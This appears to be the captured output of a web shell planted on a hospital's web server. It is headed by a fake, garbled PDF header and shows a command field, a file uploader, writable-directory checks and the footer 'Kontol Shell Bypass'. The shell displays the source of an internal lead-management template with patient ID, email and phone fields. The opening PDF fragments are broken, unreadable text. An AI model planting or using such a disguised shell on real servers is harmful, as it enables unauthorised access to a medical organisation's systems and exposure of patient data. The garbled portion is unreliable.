%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/lms/views/leads/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/lms/views/leads/leads_feedback.html
<div class="page-bar">
    <ul class="page-breadcrumb uc">
        <li><h2>Manage Leads Feedback</h2></li>
    </ul>
    <div class="page-toolbar">
    </div>
</div>
<!-- -->

<div class="tabbable-custom">
    <ul class="nav nav-tabs">
        <li class="active">
            <a href="#tab_1" data-toggle="tab" aria-expanded="true" onclick="event.preventDefault()"> Leads Feedbacks </a>
        </li>
        <li>
            <a href="#tab_2" data-toggle="tab" aria-expanded="true" onclick="event.preventDefault()" ng-if="modules['manage_disposition']"> Calling Dispositions </a>
        </li>
    </ul>

    <div class="tab-content nobdr1">
        <!-- Leads Feedbacks -->
        <div class="tab-pane active" id="tab_1">
            <!-- Search -->
            <div class="form-group">
                <!-- <a href="" class="btn purple pull-right" ng-click="CR.exportLists()"><i class="fa fa-file-excel-o"></i> Export</a> -->
                <form ng-submit="CR.lists()">
                    <div class="form-inline fc-sm">
                        <input type="text" ng-model="CR.sdata.k" class="form-control w200" placeholder="Keyword..." />
                        <select class="form-control" ng-model="CR.sdata.cat_id" ng-change="CR.sdata.remarks_id=''">
                            <option value="">Category (ALL)</option>
                            <option value="{{r.id}}" ng-repeat="r in CR.cats">{{r.title}}</option>
                        </select>
                        <select class="form-control" ng-model="CR.sdata.remarks_id">
                            <option value="">Dispositions (ALL)</option>
                            <option value="{{r.id}}" ng-repeat="r in CR.remarksDD" ng-if="r.cat_id==CR.sdata.cat_id">{{r.title}}</option>
                        </select>
                        <select class="form-control" ng-model="CR.sdata.created_by" ng-if="CR.callers.length">
                            <option value="">Created By (ALL)</option>
                            <option value="{{r.id}}" ng-repeat="r in CR.callers">{{r.name}}</option>
                        </select>
                        <input type="text" ng-model="CR.sdata.fromDate" class="form-control w130 cal hasCal" placeholder="From Date" />
                        <input type="text" ng-model="CR.sdata.toDate" class="form-control w130 cal hasCal" placeholder="To Date" />
                        
                        <button type="submit" class="btn btn-info">Search</button>
                    </div>
                </form>
            </div>
            <!-- / -->

            <div ng-if="CR.result.length">
                <div class="text-secondary bold mb10">
                    Showing {{CR.page.start+1}} - {{CR.page.start+CR.page.total}} of {{CR.page.total_records}} records.
                </div>
                <div class="table-responsive">
                    <table class="table table-condensed table-striped table-bordered table-advance table-hover">
                        <thead class="vmid">
                            <tr>
                                <th class="w20">SN</th>
                                <th class="w300">Applicant</th>
                                <th>Remarks/Comments</th>
                                <th class="w200">Counselor (Follow-up By)</th>
                            </tr>
                        </thead>
        
                        <tbody>
                            <tr ng-repeat="(i,r) in CR.result">
                                <td>{{i+CR.page.start+1}}.</td>
                                <td>
                                    {{r.name}}
                                    <div class="note-text pdT3"><span class="inblock w60">Patient ID</span>: <strong>{{r.application_no}}</strong></div>
                                    <div class="note-text pdT5">{{r.email}}</div>
                                    <div class="note-text pdT3"><i class="fa fa-mobile"></i> {{r.mob}}</div>
                                    <div class="note-text pdT3">
                                        <strong title="Center of Excellence">[{{r.program}}]</strong>
                                    </div>
                                </td>

                                <td>
                                    <div>{{r.remarks}}</div>
                                    <div>[{{r.subremarks}}]</div>
                                    <div class="note-text pdT5" ng-bind-html="renderHtml(r.feedback)"></div>
                                </td>

                                <td>
                                    {{r.usr}}
                                    <div class="pdT5">
                                        [@{{r.created}}]
                                    </div>
                                    <div class="pdT10">
                                        <button type="button" class="btn btn-xs dark" ng-click="CR.open_follow_up(r)">
                                            View Follow-up History
                                        </button>
                                    </div>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
                <div class="bold" ng-show="CR.page.total_pages>1">
                    <div dir-paging fn="CR.lists" pageob="CR.page"></div>
                </div>
            </div>
            <div class="text-center text-default pd20" ng-if="!CR.result.length">No record found.</div>
        </div>
        <!-- / -->

        <div class="tab-pane" id="tab_2">
            <!-- Search -->
            <div class="form-group">
                <a href="" class="btn blue btn-outline pull-right" ng-click="CR.openRForm()"><i class="fa fa-plus"></i> Add New</a>
                <a href="" class="btn purple btn-outline pull-right" style="margin-right: 10px;" ng-click="CR.openCatList()">Manage Categories</a>
                <form ng-submit="CR.listRemarks()">
                    <div class="form-inline fc-sm">
                        <input type="text" ng-model="CR.sdataR.k" class="form-control w200" placeholder="Keyword" />&nbsp;
                        <select class="form-control" ng-model="CR.sdataR.cat_id">
                            <option value="">Select Category</option>
                            <option value="{{r.id}}" ng-repeat="r in CR.cats">{{r.title}}</option>
                        </select>
                        <button type="submit" class="btn btn-info">Search</button>
                    </div>
                </form>
            </div>
            <!-- / -->

            <div ng-if="CR.remarks.length">
                <div class="text-secondary bold mb10">
                    Showing {{CR.remarks.length}} records.
                </div>
                <div class="table-responsive">
                    <table class="table table-condensed table-striped table-bordered table-advance table-hover">
                        <thead class="vmid">
                            <tr>
                                <th class="w20">SN</th>
                                <th class="w150">Category</th>
                                <th>Disposition</th>
                                <th class="w100">Disp. Odr</th>
                                <th class="w60">Status</th>
                                <th class="w85"></th>
                            </tr>
                        </thead>
        
                        <tbody>
                            <tr ng-repeat="(i,r) in CR.remarks">
                                <td>{{i+1}}.</td>
                                <td>{{r.cat}}</td>
                                <td>{{r.title}}</td>
                                <td>{{r.disp_odr}}</td>
                                <td>
                                    <span class="label label-sm label-success label-mini" ng-if="r.status=='1'">Active</span>
                                    <span class="label label-sm label-danger label-mini" ng-if="r.status=='0'">Inactive</span>
                                </td>
                                <td class="text-center">
                                    <div class="btn-group btn-group-solid">
                                        <button type="button" class="btn btn-xs default" ng-click="CR.editRemark(r.id)"><i class="fa fa-edit"></i></button>
                                        <button type="button" class="btn btn-xs red" ng-click="CR.deleteRemark(r.id)"><i class="fa fa-trash-o"></i></button>
                                    </div>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>
            <div class="text-center text-default pd20" ng-if="!CR.remarks.length">No record found.</div>
        </div>
    </div>
</div>


<!-- Remarks Form -->
<div class="modal bs-modal-lg in" id="rFormModal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                <h4 class="modal-title">{{CR.rData.id?'Update':'Add'}} Disposition</h4>
            </div>
            
            <div class="modal-body fi-300 err-abs form-lbl-grey">
                <form id="rForm" autocomplete="off" spellcheck="false">
                    <input type="hidden" name="id" value="{{CR.rData.id}}" />
                    <div class="row">
                        <div class="form-group col-md-12">
                            <label class="req">Disposition</label>
                            <input type="text" class="form-control" name="title" ng-model="CR.rData.title" maxlength="100">
                        </div>
                    </div>
                    
                    <div class="row">
                        <div class="form-group col-md-4">
                            <label class="req">Category</label>
                            <select class="form-control" name="cat_id" ng-model="CR.rData.cat_id">
                                <option value="0">Select Category</option>
                                <option ng-repeat="(i,r) in CR.cats" value={{r.id}} >{{r.title}}</option>
                            </select>
                        </div>
                        <div class="form-group col-md-4">
                            <label>Display Order</label>
                            <input type="text" class="form-control" name="disp_odr" ng-model="CR.rData.disp_odr" />
                        </div>
                        <div class="form-group col-md-4">
                            <label class="req">Status</label>
                            <select class="form-control" name="status" ng-model="CR.rData.status">
                                <option value="1">Active</option>
                                <option value="0">Inactive</option>
                            </select>
                        </div>
                    </div>

                    <h4 class="modal-title mb10">Sub Dispositions/Remarks</h4>
                    <div ng-repeat="(i,r) in CR.rData.subremarks" class="row">
                        <div class="col-md-9">
                            <div class="form-group">
                                <input type="text" class="form-control" placeholder="Add Remarks" value="{{r.title}}" name="subremarks[]" maxlength="100" />
                            </div>
                        </div>
                        <div class="col-md-2">
                            <div class="form-group">
                                <input type="text" class="form-control" placeholder="Display Order"  value="{{r.disp_odr}}" name="subremarks_disp_odr[]" max="10" />
                            </div>
                        </div>
                        <div class="col-md-1">
                            <div class="form-group">
                                <button class="btn btn-danger" ng-click="CR.removeSubremarks(i)"><i class="fa fa-trash"></i></button>
                            </div>
                        </div>
                    </div>
                    <div>
                        <button class="btn btn-info btn-sm" ng-click="CR.addSubremarks()"><i class="fa fa-plus"></i></button>
                    </div>
                </form>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
                <button type="button" class="btn green" ng-click="CR.saveRemark()">Save</button>
            </div>
        </div>
    </div>
</div>

<!-- Category List -->
<div class="modal bs-modal-lg in" id="catListModal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                <h4 class="modal-title">Manage Categories</h4>
            </div>
            
            <div class="modal-body err-abs form-lbl-grey">
                <div>
                    <form class="form-inline" id="catForm">
                        <input type="hidden" name="id" ng-value="CR.cat.id" />
                        <div class="form-group">
                            <input type="text" name="title" ng-model="CR.cat.title" class="form-control w250" placeholder="Category Name" />
                        </div>
                        <div class="form-group">
                            <input type="text" name="disp_odr" ng-model="CR.cat.disp_odr" class="form-control w150" placeholder="Display Order" />
                        </div>
                        <button class="btn btn-info" ng-click="CR.saveCat()">{{CR.cat.id?'Update':'Add'}}</button>
                    </form>
                </div>
                <hr class="minus14">

                <div class="bold mb5">List of Categories</div>
                <table class="table table-condensed table-striped table-bordered table-advance table-hover">
                    <thead>
                        <tr>
                            <th>Category</th>
                            <th class="w150">Display Order</th>
                            <th class="w85"></th>
                        </tr>
                    </thead>
                    <tbody>
                        <tr ng-repeat="(i,r) in CR.cats">
                            <td>{{r.title}}</td>
                            <td>{{r.disp_odr}}</td>
                            <td class="text-center">
                                <div class="btn-group btn-group-solid">
                                    <a href="" class="btn btn-xs default" ng-click="CR.catDtl(r.id)"><i class="fa fa-edit"></i></a>
                                    <a href="" class="btn btn-xs red"  ng-click="CR.delCat(r.id)" ><i class="fa fa-trash"></i></a>
                                </div>
                            </td>
                        </tr>
                    </tbody>
                </table>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
            </div>
        </div>
    </div>
</div>

<!-- Followup Modal -->
<div class="modal bs-modal-lg in modal-scroll" id="followupModal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                <h4 class="modal-title">Follow-ups</h4>
            </div>
            
            <div class="modal-body">
                <div class="form-group">
                    <div class="pull-right">Patient ID: <strong>{{CR.rlead.application_no}}</strong></div>
                    Name: <strong>{{CR.rlead.name}}</strong>
                </div>
                <div ng-if="CR.followups.length">
                    <div class="table-responsive">
                        <table class="table tablesm table-striped table-bordered table-advance table-hover nomrgn">
                            <thead>
                                <tr class="uc">
                                    <th class="w20">SN</th>
                                    <th>Remarks/Feedback</th>
                                    <th class="w200">Given By</th>
                                    <th class="w85"></th>
                                </tr>
                            </thead>
                            <tbody>
                                <tr ng-repeat="(i,r) in CR.followups">
                                    <td>{{i+1}}.</td>
                                    <td>
                                        <div class="bold">{{r.remarks}}</div>
                                        <div class="mb5">[{{r.subremarks}}]</div>
                                        <div>{{r.feedback}}</div>
                                    </td>
                                    <td>
                                        {{r.usr}}
                                        <div class="pdT5">
                                            [@{{r.created}}]
                                        </div>
                                    </td>
                                    <td class="text-center">
                                        <div class="btn-group btn-group-solid">
                                            <a href="" class="btn btn-xs default" ng-click="CR.follow_up_detail(r.id)"><i class="fa fa-edit"></i></a>
                                            <a href="" class="btn btn-xs red"  ng-click="CR.delete_follow_up(r.id)" ><i class="fa fa-trash"></i></a>
                                        </div>
                                    </td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                </div>
                <div ng-if="!CR.followups.length">No remarks/feedback found</div>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
                <button type="button" class="btn green" ng-click="CR.open_remarks_form()"><i class="fa fa-plus"></i> Add New Remarks/Feedback</button>
            </div>
        </div>
    </div>
</div>

<!-- Remarks Modal -->
<div class="modal bs-modal-md in modal-scroll" id="remarksModal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static">
    <div class="modal-dialog modal-md">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true"></button>
                <h4 class="modal-title">{{CR.rData.id?'Update':'Give'}} remarks/feedback</h4>
            </div>
            
            <div class="modal-body">
                <form id="fdbackfrm" autocomplete="off" spellcheck="false">
                    <input type="hidden" name="id" value="{{ CR.rData.id }}" />
                    <input type="hidden" name="applicant_id" value="{{ CR.rData.applicant_id }}" />
                    <div class="form-group">
                        <div class="pull-right">Patient ID: <strong>{{CR.rlead.application_no}}</strong></div>
                        Name: <strong>{{CR.rlead.name}}</strong>
                    </div>
                    <div class="form-group">
                        <label class="req">Disposition Category</label>
                        <select class="form-control" ng-model="CR.rData.cat_id" ng-change="CR.rData.remarks_id=''; CR.rData.subremarks=''; CR.subremarks=[]">
                            <option value="">Select</option>
                            <option value="{{r.id}}" ng-repeat="r in CR.cats">{{r.title}}</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="req">Disposition</label>
                        <select class="form-control" name="remarks_id" ng-model="CR.rData.remarks_id" ng-change="CR.getSubremarks(CR.rData.remarks_id)">
                            <option value="">Select</option>
                            <option value="{{r.id}}" ng-repeat="r in CR.remarks" ng-if="r.cat_id==CR.rData.cat_id">{{r.title}}</option>
                        </select>
                    </div>
                    <div class="form-group">
                        <label class="req">Remarks</label>
                        <select class="form-control" name="subremarks" ng-model="CR.rData.subremarks">
                            <option value="">Select</option>
                            <option value="{{r.title}}" ng-repeat="r in CR.subremarks track by $index">{{r.title}}</option>
                        </select>
                    </div>
                    <div>
                        <label class="req">Comment</label>
                        <textarea class="form-control" rows="6" name="feedback" ng-model="CR.rData.feedback"></textarea>
                    </div>
                </form>
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
                <button type="button" class="btn green" ng-click="CR.addRemark()">Save</button>
            </div>
        </div>
    </div>
</div>

Kontol Shell Bypass